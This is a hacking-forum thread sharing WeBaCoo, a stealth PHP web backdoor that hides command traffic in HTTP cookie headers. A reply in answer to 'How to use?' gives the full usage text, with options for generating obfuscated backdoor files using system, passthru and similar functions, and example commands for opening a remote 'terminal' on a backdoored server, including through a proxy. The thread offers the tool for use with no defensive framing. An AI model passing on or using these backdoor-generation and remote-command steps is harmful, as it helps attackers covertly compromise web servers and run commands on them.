Nax Posted December 3, 2011 Share Posted December 3, 2011 (edited) This is the hidden content, please Sign In or Sign Up WeBaCoo (Web Backdoor Cookie) is a tiny stealth PHP backdoor. It uses the HTTP Cookie Header for data transfer, in order to simulate a remote “terminal” connection with the backdoored server. WeBaCoo offers a generate mode to create the PHP backdoor code using predefined payloads. It also offers the “terminal” mode where the user can establish a remote “terminal” connection with the server and execute desired commands under the web service’s running user privileges. WeBaCoo is written in Perl under GPLv3 license and is hosted at Github. Changelog v0.1.1 Added 4xx HTTP status error code handling Download WeBaCoo v0.1.1 This is the hidden content, please Sign In or Sign Up [spoiler=README] This is the hidden content, please Sign In or Sign Up Edited December 3, 2011 by Nax Link to comment Share on other sites More sharing options...
Versus71 Posted January 29, 2012 Share Posted January 29, 2012 update v 0.2.1 Download: This is the hidden content, please Sign In or Sign Up Link to comment Share on other sites More sharing options...
yes0rno Posted January 29, 2012 Share Posted January 29, 2012 How to use? Link to comment Share on other sites More sharing options...
sQuo Posted January 29, 2012 Share Posted January 29, 2012 How to use? Usage ===== webacoo.pl [options] Options: -g Generate backdoor code (-o is required) -f FUNCTION PHP System function to use FUNCTION 1: system (default) 2: shell_exec 3: exec 4: passthru 5: popen -o OUTPUT Generated backdoor output filename -r Return un-obfuscated backdoor code -t Establish remote "terminal" connection (-u is required) -u URL Backdoor URL -c C_NAME Cookie name (default "M-cookie") -d DELIM Delimiter (default "wBc") -a AGENT HTTP header user-agent (default exist) -p PROXY Use proxy IP:PORT -h Display help and exit Examples ======== 1. Create 'backdoor.php' obfuscated backdoor with default settings ./webacoo.pl -g -o backdoor.php 2. Create 'raw-backdoor.php' un-obfuscated backdoor using 'passthru' function ./webacoo.pl -g -o raw-backdoor.php -f 4 -r 3. Establish "terminal" connection with remote host using the default setup ./webacoo.pl -t -u http://127.0.0.1/backdoor.php'>http://127.0.0.1/backdoor.php 4. Establish "terminal" connection with remote host while setting some args ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT" 5. Establish "terminal" connection with remote host through local http proxy ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080 Link to comment Share on other sites More sharing options...
Recommended Posts